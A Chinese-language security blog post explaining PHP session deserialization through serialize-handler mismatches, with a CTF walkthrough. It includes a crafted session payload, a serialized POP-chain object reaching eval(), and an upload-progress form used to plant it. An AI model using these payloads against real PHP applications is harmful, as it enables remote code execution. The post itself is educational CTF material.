<!DOCTYPE html>
<html lang="zh-CN">










<head><meta name="generator" content="Hexo 3.8.0">
    <meta charset="utf-8">
    <link rel="apple-touch-icon" sizes="76x76" href="/apple-touch-icon.png">
    <link rel="icon" type="image/png" href="/favicon.png">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta http-equiv="x-ua-compatible" content="ie=edge">
    <meta name="description" content="">
    <meta name="author" content="chuddy">
    <meta name="keywords" content="">
    <title>session 反序列化 ~ chuddy&#39;s Blog</title>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.7.2/css/all.css">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/mdbootstrap@4.7.4/css/bootstrap.min.css">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/mdbootstrap@4.7.4/css/mdb.min.css">
    <link rel="stylesheet" href="/css/style.css">
    <link rel="stylesheet" href="https://at.alicdn.com/t/font_1067060_vr10bjtg3us.css">
    
        <link rel="stylesheet" href="/css/Prettify/tomorrow-night-eighties.min.css">
    
</head>

<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
<div class="container">
    <a class="navbar-brand" href="/"><strong>chuddy&#39;s Blog</strong></a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
        <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
        <ul class="navbar-nav ml-auto text-center">
            
            <li class="nav-item">
                <a class="nav-link" href="/">Home</a>
            </li>
            
            <li class="nav-item">
                <a class="nav-link" href="/archives/">Archives</a>
            </li>
            
        </ul>
    </div>
</div>


</nav>
    <div class="view intro-2" style='background: url("/post.jpg")no-repeat center center;background-size: cover;'>
    <div class="full-bg-img">
        <div class="mask rgba-black-light flex-center">
        <div class="container text-center white-text wow fadeInUp">
            <p class="h2">session 反序列化</p>
            <br>
            
            <p>Tuesday, May 14th 2019, 6:49 pm</p>
            
        </div>
        </div>
    </div>
    </div>
  </header>

  <main>
  
  <div class="container-fluid">
    <div class="row">
        <div class="col-md-8 offset-md-2 ">
            <div class="post-content py-5 z-depth-3 main">
                <h1 id="session-反序列化"><a href="#session-反序列化" class="headerlink" title="session-反序列化"></a>session-反序列化</h1><h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>通过一道ctf题，感觉自己对php session 反序列化的认识并不深刻，所以想要再次总结一下</p>
<a id="more"></a>
<h2 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h2><p>在<code>php.ini</code>中存在几项配置项：</p>
<pre><code>session.save_path=&quot;&quot;   --设置session的存储路径
session.save_handler=&quot;&quot; --设定用户自定义存储函数，如果想使用PHP内置会话存储机制之外的可以使用本函数(数据库等方式)
session.auto_start   boolen --指定会话模块是否在请求开始时启动一个会话,默认为0不启动
session.serialize_handler   string --定义用来序列化/反序列化的处理器名字。默认使用php

</code></pre><p>以上的选项就是与PHP中的Session存储和序列话存储有关的选项。</p>
<p>在使用xampp组件安装中，上述的配置项的设置如下：</p>
<pre><code>session.save_path=&quot;D:\xampp\tmp&quot;    表明所有的session文件都是存储在xampp/tmp下
session.save_handler=files              表明session是以文件的方式来进行存储的
session.auto_start=0                表明默认不启动session
session.serialize_handler=php           表明session的默认序列话引擎使用的是php序列话引擎

</code></pre><p>在上述的配置中，<code>session.serialize_handler</code>是用来设置<code>session</code>的序列话引擎的，除了默认的PHP引擎之外，还存在其他引擎，不同的引擎所对应的<code>session</code>的存储方式不相同。</p>
<ul>
<li>php_binary:存储方式是，键名的长度对应的ASCII字符+键名+经过serialize()函数序列化处理的值</li>
<li>php:存储方式是，键名+竖线+经过serialize()函数序列处理的值</li>
<li>php_serialize(php&gt;5.5.4):存储方式是，经过serialize()函数序列化处理的值</li>
</ul>
<p>默认引擎为<code>PHP</code>引擎, 可以添加代码<code>ini_set(&#39;session.serialize_handler&#39;, &#39;需要设置的引擎&#39;);</code></p>
<h2 id="session-存储机制"><a href="#session-存储机制" class="headerlink" title="session 存储机制"></a>session 存储机制</h2><p>php中的session的内容并不是放在内存中的，二十以文件的方式来存储的，存储方式就是有配置项<code>session.sace_handler</code>来进行确定的,默认是以文件的方式存储。</p>
<p>存储文件都是以<code>sess_sessionid</code>来进行命名的，文件的内容就是session值的序列化之后的内容</p>
<p>不同版本的引擎  保存的文件也不同<br>同样存储<code>$_SESSION[&#39;chuddy&#39;]=、&quot;chuddy123&quot;;</code>这样的一个session</p>
<pre><code>ini_set(&#39;session.serialize_handler&#39;, &#39;php_serialize&#39;);
a:1:{s:6:&quot;chuddy&quot;;s:9:&quot;chuddy123&quot;;}


ini_set(&#39;session.serialize_handler&#39;, &#39;php&#39;);
chuddy|s:9:&quot;chuddy123&quot;;


ini_set(&#39;session.serialize_handler&#39;, &#39;php_binary&#39;);
chuddys:9:&quot;chuddy123&quot;;
由于`chuddy`的长度是6，6在ASCII表中对应的就是&lt;0x06&gt;。

根据php_binary的存储规则，最后就是chuddys:9:&quot;chuddy123&quot;;

</code></pre><h2 id="PHP-Session中的序列化的危害"><a href="#PHP-Session中的序列化的危害" class="headerlink" title="PHP Session中的序列化的危害"></a>PHP Session中的序列化的危害</h2><p>PHP中的Session的实现是没有的问题，危害主要是由于程序员的Session使用不当而引起的。</p>
<p>如果在PHP在反序列化存储的$_SESSION数据时使用的引擎和序列化使用的引擎不一样，会导致数据无法正确第反序列化。通过精心构造的数据包，就可以绕过程序的验证或者是执行一些系统的方法。</p>
<p>例如：</p>
<pre><code>$_SESSION[&#39;chuddy&#39;] = &#39;|O:11:&quot;chuddyClass&quot;:0:{}&#39;;

</code></pre><p>上述的$_SESSION数据使用<code>php_serialize</code>，那么最后的存储的内容就是<code>a:1:{s:6:&quot;chuddy&quot;;s:24:&quot;|O:11:&quot;chuddyClass&quot;:0:{}&quot;;}</code>。</p>
<p>但是当我们进行读取的时候，选择的是<code>php</code>，那么最后读取的内容就会发生改变的<br>当使用<code>php</code>引擎的时候，<code>php</code>引擎会以<code>|</code>作为<code>key</code>和<code>value</code>的分隔符，那么就会将<code>a:1:{s:6:&quot;chuddy&quot;;s:24:&quot;</code>作为SESSION的key值，将<code>O:11:&quot;chuddyClass&quot;:0:{}&quot;;}</code>作为SESSION的value值，然后进行反序列化，最后会得到<code>chuddyClass</code>这个类</p>
<p>这种由于序列话化和反序列化所使用的不一样的引擎就是造成PHP Session序列话漏洞的原因。</p>
<h2 id="实际利用"><a href="#实际利用" class="headerlink" title="实际利用"></a>实际利用</h2><p>存在session1.php和session2.php着这两个文件</p>
<p>session1.php</p>
<pre><code>&lt;?php
ini_set(&#39;session.serialize_handler&#39;,&#39;php_serialize&#39;);


echo @$_GET[&#39;chuddy&#39;];
session_start();
$_SESSION[&#39;chuddy&#39;] = @$_GET[&#39;chuddy&#39;];

?&gt;
</code></pre><p>session2.php</p>
<pre><code>&lt;?php 
ini_set(&#39;session.serialize_handler&#39;,&#39;php&#39;);
session_start();

var_dump($_SESSION);

class chuddy{

    function __destruct(){
        echo phpinfo();
    }
}

?&gt;
</code></pre><p>当访问session1.php时 提交一下数据：</p>
<pre><code>session1.php?chuddy=|O:6:%22chuddy%22:0:{}
</code></pre><p>此时传入的数据会按照<code>php_serialize</code>来进行序列化存储</p>
<p>然后去访问session2.php,页面会输出<code>phpinfo()</code>函数，说明成功执行了我们构造的函数。</p>
<p>是因为在访问session2.php时，程序会按照php引擎来解析，SESSION中的数据，此时就会反序列化伪造的数据，就会实例化一个<code>chuddy</code>对象，最后就会执行析构函数中的<code>phpinfo()</code></p>
<h2 id="CTF例题"><a href="#CTF例题" class="headerlink" title="CTF例题"></a>CTF例题</h2><p>安恒月赛的一道  反序列化题目：</p>
<p>环境配置：</p>
<pre><code>php版本&gt;5.5.4

#php.ini部分相关配置
session.auto_start=Off
session.serialize_handler=php_serialize
session.upload_progress.cleanup=Off
session.upload_progress.enabled=On
</code></pre><p>主要给出了几个文件的源码：</p>
<p>class.php</p>
<pre><code>&lt;?php

highlight_string(file_get_contents(basename($_SERVER[&#39;PHP_SELF&#39;])));
//show_source(__FILE__);

class foo1{
        public $varr;
        function __construct(){
                $this-&gt;varr = &quot;index.php&quot;;
        }
        function __destruct(){
                if(file_exists($this-&gt;varr)){
                        echo &quot;&lt;br&gt;文件&quot;.$this-&gt;varr.&quot;存在&lt;br&gt;&quot;;
                }
                echo &quot;&lt;br&gt;这是foo1的析构函数&lt;br&gt;&quot;;
        }
}

class foo2{
        public $varr;
        public $obj;
        function __construct(){
                $this-&gt;varr = &#39;1234567890&#39;;
                $this-&gt;obj = null;
        }
        function __toString(){
                $this-&gt;obj-&gt;execute();
                return $this-&gt;varr;
        }
        function __desctuct(){
                echo &quot;&lt;br&gt;这是foo2的析构函数&lt;br&gt;&quot;;
        }
}

class foo3{
        public $varr;
        function execute(){
                eval($this-&gt;varr);
        }
        function __desctuct(){
                echo &quot;&lt;br&gt;这是foo3的析构函数&lt;br&gt;&quot;;
        }
}

?&gt;
</code></pre><p>index.php</p>
<pre><code>&lt;?php

ini_set(&#39;session.serialize_handler&#39;, &#39;php&#39;);

require(&quot;./class.php&quot;);

session_start();

$obj = new foo1();

$obj-&gt;varr = &quot;phpinfo.php&quot;;

?&gt;
</code></pre><p>phpinfo.php</p>
<pre><code>&lt;?php
    session_start();
    require(&quot;./class.php&quot;);

    $f3 = new foo3();
    $f3-&gt;varr = &quot;phpinfo();&quot;;
    $f3-&gt;execute();
?&gt;
</code></pre><p>通过代码 发现了危险函数<code>eval</code> 可以想到利用php session 反序列化来进行构造自己想要的</p>
<p>访问phpinfo.php 发现<br>[<img src="https://s2.ax1x.com/2019/05/16/Eba1i9.md.png" alt="Eba1i9.md.png">]<br>可以看到一些敏感的配置信息，也找到一下比较有用的信息</p>
<p><code>session.upload_progress.enabled</code>，当它为开启状态时，PHP能够在每一个文件上传时监测上传进度。</p>
<p>当一个上传在处理中，同时POST一个与php.ini中设置的<code>session.upload_progress.name</code>同名变量时，上传进度就可以在$_SESSION中获得。</p>
<p>当PHP检测到这种POST请求时，它会在$_SESSION中添加一组数据, 索引是session.upload_progress.prefix与 session.upload_progress.name连接在一起的值。</p>
<pre><code>a:1:{s:19:&quot;upload_progress_123&quot;;a:5:{s:10:&quot;start_time&quot;;i:1558005301;s:14:&quot;content_length&quot;;i:471;s:15:&quot;bytes_processed&quot;;i:471;s:4:&quot;done&quot;;b:1;s:5:&quot;files&quot;;a:1:{i:0;a:7:{s:10:&quot;field_name&quot;;s:4:&quot;file&quot;;s:4:&quot;name&quot;;s:139:&quot;|O:4:&quot;foo1&quot;:1:{s:4:&quot;varr&quot;;O:4:&quot;foo2&quot;:2:{s:4:&quot;varr&quot;;s:10:&quot;1234567890&quot;;s:3:&quot;obj&quot;;O:4:&quot;foo3&quot;:1:{s:4:&quot;varr&quot;;s:24:&quot;var_dump(scandir(&quot;./&quot;));&quot;;}}}
</code></pre><p>测试一下 构造一个可以实现我们想要的功能的<br>本地测试的代码：</p>
<pre><code>&lt;?php
class foo3{
        public $varr=&#39;var_dump(scandir(&quot;./&quot;));&#39;;
        function execute(){
                eval($this-&gt;varr);
        }
}
class foo2{
        public $varr;
        public $obj;
        function __construct(){
                $this-&gt;varr = &#39;1234567890&#39;;
                $this-&gt;obj = new foo3();
        }
        function __toString(){
                $this-&gt;obj-&gt;execute();
                return $this-&gt;varr;
        }
}

class foo1{
        public $varr;
        function __construct(){
                $this-&gt;varr = new foo2();
        }
}




$obj = new foo1();
print_r(serialize($obj));
?&gt;

</code></pre><p>在foo1中的构造函数中定义varr的值为foo2的实例，在foo2中定义obj为foo3的实例，在foo3中定义$varr的值var_dump(scandir(‘./‘));</p>
<p>输出了序列化后的类</p>
<pre><code>O:4:&quot;foo1&quot;:1:{s:4:&quot;varr&quot;;O:4:&quot;foo2&quot;:2:{s:4:&quot;varr&quot;;s:10:&quot;1234567890&quot;;s:3:&quot;obj&quot;;O:4:&quot;foo3&quot;:1:{s:4:&quot;varr&quot;;s:24:&quot;var_dump(scandir(&quot;./&quot;));&quot;;}}}
</code></pre><p>然后通过上面讲的将这个类存入session文件中:</p>
<pre><code>&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
    &lt;title&gt;test&lt;/title&gt;
    &lt;meta charset=&quot;utf-8&quot;&gt;
&lt;/head&gt;
&lt;body&gt;
    &lt;form action=&quot;./index.php&quot; method=&quot;POST&quot; enctype=&quot;multipart/form-data&quot;&gt;
        &lt;input type=&quot;hidden&quot; name=&quot;PHP_SESSION_UPLOAD_PROGRESS&quot; value=&quot;123&quot; /&gt;
        &lt;input type=&quot;file&quot; name=&quot;file&quot; /&gt;
        &lt;input type=&quot;submit&quot; value=&quot;go&quot; /&gt;
    &lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;

</code></pre><p>然后抓包修改相应的内容：</p>
<p>[<img src="https://s2.ax1x.com/2019/05/16/EbBRcn.md.png" alt="EbBRcn.md.png">]</p>
<p>然后修改相应的参数 就可以找到 flag文件  并读取出来；这就不一一细说了。</p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>感觉自己还是特别菜  好多还不会  </p>
<p>希望能够静下心来 好好学</p>

                <hr>
                <div>
                    <p>
                         
                        <span class="badge badge-light">#&nbsp;web漏洞</span>
                        &nbsp;
                        
                    </p>
                </div>
                <br>
                
            </div>
        </div>
        <div class="d-none d-md-block col-md-2">
            
  <div id="toc" class="py-5">
    <p class="h6"><i class="iconfont icon-toc" style="vertical-align:middle"></i> Toc:</p> 
    <div id="tocbot"></div>
  </div>

        </div>
    </div>        
</div>

<br><br><br>

<!-- Comments -->
<div class="comments" id="comments">
 
</div>
  
  </main>

<footer class="mt-5">
  <div class="text-center py-3">
    <a href="https://hexo.io" target="_blank"><b>HEXO</b></a>
    <i class="iconfont icon-love"></i>
    <a href="https://github.com/0x2e/Material-T" target="_blank"> <b>Material-T</b></a>
  </div>
</footer>

  <!-- SCRIPTS -->
  <script src="https://cdn.jsdelivr.net/npm/mdbootstrap@4.7.4/js/jquery-3.3.1.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/mdbootstrap@4.7.4/js/popper.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/mdbootstrap@4.7.4/js/bootstrap.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/mdbootstrap@4.7.4/js/mdb.min.js"></script>
  <script src="/js/main.js"></script>
  
    
      <script src="https://cdnjs.cloudflare.com/ajax/libs/tocbot/4.4.2/tocbot.min.js"></script>
    
    <script src="/js/post.js"></script>
    
      <script src="/js/plugins/prettify.js"></script>
      <script>
          $(document).ready(function(){
              $('pre').addClass('prettyprint linenums');
              prettyPrint();
          })
      </script>
    
  
</body>
</html>